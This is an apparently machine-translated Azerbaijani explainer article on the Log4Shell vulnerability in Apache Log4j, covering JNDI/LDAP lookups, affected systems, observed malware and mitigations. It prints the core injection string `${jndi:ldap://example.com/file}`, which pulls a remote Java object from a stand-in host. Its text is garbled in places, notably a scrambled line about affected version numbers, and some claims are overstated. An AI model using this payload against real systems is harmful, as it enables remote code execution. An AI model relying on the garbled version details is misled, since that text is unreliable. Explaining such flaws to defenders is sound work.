Mündəricat[Gizlət][Göstər]
2021-ci ilin noyabr ayının sonunda biz kibertəhlükəsizlik üçün böyük təhlükə aşkarladıq. Bu istismar potensial olaraq dünyada milyonlarla kompüter sisteminə təsir göstərə bilər.
Bu, Log4j zəifliyi və gözdən qaçan dizayn qüsurunun dünyadakı kompüter xidmətlərinin 90%-dən çoxunun hücuma açıq qalması haqqında bələdçidir.
Apache Log4j, Apache Software Foundation tərəfindən hazırlanmış açıq mənbəli Java əsaslı giriş proqramıdır. Əvvəlcə 2001-ci ildə Ceki Gülcü tərəfindən yazılmış, indi Apache Software Foundation layihəsi olan Apache Logging Services-in bir hissəsidir.
Dünyanın hər yerindən şirkətlər öz proqramlarında daxil olmağı aktivləşdirmək üçün Log4j kitabxanasından istifadə edirlər. Əslində, Java kitabxanası o qədər genişdir ki, siz onu Amazon, Microsoft, Google və digər proqramlarda tapa bilərsiniz.
Kitabxananın üstünlüyü o deməkdir ki, koddakı hər hansı potensial qüsur milyonlarla kompüteri sındırmaya açıq qoya bilər. 24 noyabr 2021-ci il tarixində A bulud təhlükəsizliyi Alibaba üçün çalışan tədqiqatçı dəhşətli bir qüsur aşkar etdi.
Log4Shell kimi də tanınan Log4j zəifliyi 2013-cü ildən bəri müşahidə edilmədən mövcud idi. Zəiflik zərərli aktorlara Log4j ilə işləyən təsirə məruz qalmış sistemlərdə kod işlətməyə imkan verdi. 9 dekabr 2021-ci ildə ictimaiyyətə açıqlandı
Sənaye mütəxəssisləri Log4Shell qüsurunu adlandırırlar son yaddaşdakı ən böyük zəiflik.
Zəifliyin dərcindən bir həftə sonra kibertəhlükəsizlik qrupları milyonlarla hücum aşkarladı. Bəzi tədqiqatçılar hətta dəqiqədə yüzdən çox hücum sürətini müşahidə etdilər.
Necə işləyir?
Log4Shell-in niyə bu qədər təhlükəli olduğunu anlamaq üçün onun nəyə qadir olduğunu başa düşməliyik.
Log4Shell zəifliyi ixtiyari kodun icrasına imkan verir ki, bu da əsasən təcavüzkarın hədəf maşında istənilən əmr və ya kodu işlədə bilməsi deməkdir.
Bunu necə həyata keçirir?
Əvvəlcə JNDI-nin nə olduğunu başa düşməliyik.
Java Adlandırma və Kataloq İnterfeysi (JNDI) Java proqramlarına ad vasitəsilə məlumat və resursları kəşf etməyə və axtarmağa imkan verən Java xidmətidir. Bu kataloq xidmətləri vacibdir, çünki onlar proqramların yaradılması zamanı tərtibatçıların asanlıqla istinad edə bilmələri üçün mütəşəkkil qeydlər toplusunu təmin edir.
JNDI müəyyən bir kataloqa daxil olmaq üçün müxtəlif protokollardan istifadə edə bilər. Bu protokollardan biri Lightweight Directory Access Protocol və ya LDAP-dır.
Bir sətir daxil edərkən, log4j formanın ifadələri ilə qarşılaşdıqda sətir əvəzetmələrini yerinə yetirir ${prefix:name}
.
Misal üçün, Text: ${java:version}
Mətn kimi daxil ola bilər: Java versiyası 1.8.0_65. Bu cür əvəzləmələr adi haldır.
kimi ifadələrə də sahib ola bilərik Text: ${jndi:ldap://example.com/file}
LDAP protokolu vasitəsilə URL-dən Java obyektini yükləmək üçün JNDI sistemindən istifadə edir.
Bu, həmin URL-dən gələn məlumatları maşına effektiv şəkildə yükləyir. İstənilən potensial haker zərərli kodu ictimai URL-də yerləşdirə və Log4j istifadə edən maşınların onu daxil etməsini gözləyə bilər.
Jurnal mesajlarının məzmunu istifadəçi tərəfindən idarə olunan məlumatları ehtiva etdiyi üçün hakerlər nəzarət etdikləri LDAP serverlərinə işarə edən öz JNDI istinadlarını daxil edə bilərlər. Bu LDAP serverləri JNDI-nin zəiflik vasitəsilə icra edə biləcəyi zərərli Java obyektləri ilə dolu ola bilər.
Bunu daha da pisləşdirən odur ki, tətbiqin server tərəfi və ya müştəri tərəfi olmasının fərqi yoxdur.
Nə qədər ki, logger üçün təcavüzkarın zərərli kodunu oxumaq üçün bir yol var, tətbiq hələ də istismarlara açıqdır.
Kim təsirləndi?
Zəiflik 4-dan 2.0-ə qədər olan versiyaları olan APAche Log2.14.1j-dən istifadə edən bütün sistemlərə və xidmətlərə təsir göstərir.
Bir neçə təhlükəsizlik mütəxəssisi bu boşluğun Java-dan istifadə edən bir sıra proqramlara təsir edə biləcəyini məsləhət görür.
Qüsur ilk dəfə Microsoft-a məxsus Minecraft video oyununda aşkar edilib. Microsoft hər hansı riskin qarşısını almaq üçün istifadəçilərini Java nəşri olan Minecraft proqramını təkmilləşdirməyə çağırıb.
Kibertəhlükəsizlik və İnfrastruktur Təhlükəsizliyi Agentliyinin (CISA) direktoru Jen Easterly deyir ki, satıcılar böyük məsuliyyət son istifadəçilərin bu zəiflikdən istifadə edən zərərli aktyorların qarşısını almaq üçün.
“Satışçılar həmçinin müştəriləri ilə əlaqə saxlamalıdırlar ki, son istifadəçilər məhsullarının bu zəifliyi ehtiva etdiyini bilsinlər və proqram yeniləmələrinə üstünlük versinlər.”
Hücumların artıq başladığı bildirilir. Kibertəhlükəsizlik proqram təminatı ilə təmin edən Symantec şirkəti müxtəlif sayda hücum sorğularını müşahidə edib.
Tədqiqatçıların aşkar etdiyi hücum növlərinə bəzi nümunələr:
- botnets
Botnetlər bir hücum edən tərəfin nəzarəti altında olan kompüterlər şəbəkəsidir. Onlar DDoS hücumlarını həyata keçirməyə, məlumatları oğurlamağa və digər fırıldaqlara kömək edir. Tədqiqatçılar Muhstik botnetini Log4j istismarından endirilmiş shell skriptlərində müşahidə ediblər.
- XMRig Miner Trojan
XMRig, Monero tokenini çıxarmaq üçün CPU-lardan istifadə edən açıq mənbəli kriptovalyuta mədənçisidir. Kibercinayətkarlar XMRig-i insanların cihazlarına quraşdıra bilərlər ki, onlar öz emal güclərindən xəbərsiz istifadə edə bilsinlər.
- Khonsari Ransomware
Ransomware zərərli proqram üçün nəzərdə tutulmuş bir forma aiddir faylları şifrələyin kompüterdə. Təcavüzkarlar daha sonra şifrələnmiş fayllara girişin geri qaytarılması müqabilində ödəniş tələb edə bilərlər. Tədqiqatçılar Log4Shell hücumlarında Khonsari ransomware proqramını aşkar ediblər. Onlar Windows serverlərini hədəfləyir və .NET çərçivəsindən istifadə edirlər.
Nə gələn olur?
Mütəxəssislər hesab edirlər ki, Log4J zəifliyinin yaratdığı xaosu tam düzəltmək aylar və ya bəlkə də illər çəkə bilər.
Bu proses hər təsirlənmiş sistemin yamaqlı versiya ilə yenilənməsini nəzərdə tutur. Bütün bu sistemlər yamaqlansa belə, hələ də hakerlərin serverlərin hücum üçün açıq olduğu pəncərəsinə əlavə etmiş ola biləcək arxa qapılar təhlükəsi var.
Çox həllər və təsirlərin azaldılması proqramların bu səhv tərəfindən istismar edilməsinin qarşısını almaq üçün mövcuddur. Yeni Log4j 2.15.0-rc1 versiyası bu zəifliyi azaltmaq üçün müxtəlif parametrləri dəyişdi.
JNDI istifadə edən bütün funksiyalar defolt olaraq deaktiv ediləcək və uzaqdan axtarışlar da məhdudlaşdırılıb. Log4j quraşdırmanızda axtarış funksiyasını söndürmək mümkün istismar riskini azaltmağa kömək edəcək.
Log4j xaricində hələ də açıq mənbə istismarlarının qarşısını almaq üçün daha geniş plana ehtiyac var.
Mayın əvvəlində Ağ Ev bir bəyanat yaymışdı icra əmri milli kibertəhlükəsizliyi yaxşılaşdırmaq məqsədi daşıyırdı. Buraya proqram təminatının materialları sənədi (SBOM) üçün müddəa daxildir ki, bu da proqramın qurulması üçün lazım olan hər bir elementin siyahısını ehtiva edən rəsmi sənəd idi.
Bura kimi hissələr daxildir açıq mənbə inkişaf üçün istifadə olunan paketlər, asılılıqlar və API-lər. SBOM ideyası şəffaflıq üçün faydalı olsa da, həqiqətən istehlakçıya kömək edəcəkmi?
Asılılıqları təkmilləşdirmək çox çətin ola bilər. Şirkətlər alternativ paketlər tapmaq üçün əlavə vaxt itirmək riskindənsə, sadəcə olaraq istənilən cərimələri ödəməyi seçə bilərlər. Bəlkə də bu SBOM-lar yalnız faydalı olacaqlar vüsət daha da məhdudlaşdırılır.
Nəticə
Log4j problemi təşkilatlar üçün sadəcə texniki problem deyil.
Biznes liderləri öz serverləri, məhsulları və ya xidmətləri özlərinin saxlamadıqları koda etibar etdikdə baş verə biləcək potensial risklərdən xəbərdar olmalıdırlar.
Açıq mənbə və üçüncü tərəf proqramlarına güvənmək həmişə müəyyən miqdarda risklə gəlir. Şirkətlər yeni təhlükələr üzə çıxmazdan əvvəl risklərin azaldılması strategiyalarını işləyib hazırlamalıdırlar.
İnternetin çox hissəsi bütün dünyada minlərlə könüllü tərəfindən idarə olunan açıq mənbə proqram təminatına əsaslanır.
İnterneti təhlükəsiz yerdə saxlamaq istəyiriksə, hökumətlər və korporasiyalar açıq mənbə səylərini və kibertəhlükəsizlik agentliklərini maliyyələşdirməyə sərmayə qoymalıdırlar. CISA.
Cavab yaz